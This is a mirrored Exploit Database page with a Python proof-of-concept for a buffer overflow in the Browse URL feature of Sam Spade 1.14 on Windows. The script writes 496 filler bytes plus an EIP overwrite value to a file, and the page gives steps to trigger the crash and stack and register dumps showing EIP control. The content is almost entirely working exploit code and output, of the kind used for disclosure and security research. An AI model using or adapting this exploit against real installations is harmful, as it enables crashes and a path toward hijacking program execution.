Sam Spade 1.14 – Browse URL Buffer Overflow (PoC)

• Exploit Database
• 118 阅读

• 作者： Nipun Jaswal
  日期： 2015-11-16
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38705/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  #!/usr/bin/env python # Exploit Title : Sam Spade 1.14 Browse URL Buffer Overflow PoC # Discovery by: Nipun Jaswal # Email : mail@nipunjaswal.info # Discovery Date: 14/11/2015 # Vendor Homepage : http://samspade.org # Software Link : http://www.majorgeeks.com/files/details/sam_spade.html # Tested Version: 1.14 # Vulnerability Type: Denial of Service / Proof Of Concept/ Eip Overwrite # Tested on OS: Windows 7 Home Basic # Crash Point : Go to Tools > Browse Web> Enter the contents of 'sam_spade_browse_url.txt' > OK , Note: Do #Not Remove the http:// ########################################################################################## #-----------------------------------NOTES----------------------------------------------# ########################################################################################## # And the Stack #0012F73C 41414141AAAA #0012F740 41414141AAAA #0012F744 DEADBEAF¯¾­Þ   # Registers #EAX 00000001 #ECX 00000001 #EDX 00000030 #EBX 00000000 #ESP 0012F74C #EBP 41414141 #ESI 008DA260 #EDI 0176F4E0 #EIP DEADBEAF   f = open("sam_spade_browse_url.txt", "w") Junk = "A"* 496 eip_overwrite = "\xaf\xbe\xad\xde" f.write(Junk+eip_overwrite) f.close()